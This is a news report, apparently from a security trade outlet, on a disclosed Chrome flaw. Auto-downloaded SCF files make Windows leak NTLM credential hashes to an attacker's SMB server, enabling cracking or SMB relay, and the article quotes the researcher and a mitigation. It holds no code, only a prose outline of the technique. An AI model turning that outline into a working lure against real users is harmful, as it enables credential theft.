A flaw in Google Chrome could allow criminals to infect a victim's machine with malware and steal Windows credentials. The flaw could also allow SMB relay attacks to be launched.
The flaw was discovered by Bosko Stankovic, security engineer at DefenseCode, In a blogpost, he said that once a victim is duped into clicking on a malicious link in a Chrome browser window, this could then download a Windows Explorer Shell Command File or SCF file. Chrome automatically deems such files as safe.
The file does nothing until the download directory window is opened. The SCF automatically tries to retrieve an icon associated with the file. To do so, the user's computer presents its credentials to a remote server (user ID and password). In turn, this information is revealed to the hacker.
“The remote SMB server set up by the attacker is ready to capture the victim's username and NTLMv2 password hash for offline cracking or relay the connection to an externally available service that accepts the same kind of authentication (e.g. Microsoft Exchange) to impersonate the victim without ever knowing the password,” said Stankovic.
He said that an attacker just needs to entice the victim (using fully updated Google Chrome and Windows) to visit his web site to be able to proceed and reuse victim's authentication credentials.
“Even if the victim is not a privileged user (for example, an administrator), such vulnerability could pose a significant threat to large organisations as it enables the attacker to impersonate members of the organisation. Such an attacker could immediately reuse gained privileges to further escalate access and perform attacks on other users or gain access and control of IT resources,” he added.
The credentials can also be used in an SMB relay attack.
"Organizations that allow remote access to services such as Microsoft Exchange (Outlook Anywhere) and use NTLM as authentication method, may be vulnerable to SMB relay attacks, allowing the attacker to impersonate the victim, accessing data and systems without having to crack the password."
Stankovic said he hoped that an update for Google Chrome would be rolled out to fix the issue. He added that Google has been notified of the problem.
Cal Leeming, convicted hacker and now CEO of Lyons Leeming, told SC Media UK that this was an interesting attack.
“The best mitigation we've seen for these attacks is to ensure SMB traffic is blocked externally, as mentioned by the author of this article. This can be done on a per host basis, but doing it at the network level (e.g. router or edge equipment) will likely be easier for most families and organisations,” he said.
Mark Wardlow, security consultant at SureCloud, told SC that the vulnerability still requires some level of user interaction and only affects Google Chrome.“However, with a carefully crafted webpage, it could be trivial to convince users to perform the necessary actions to trigger this particular attack. Organisations that do not control the installation of software or allow their user base to use Google Chrome are most at risk here,” he said.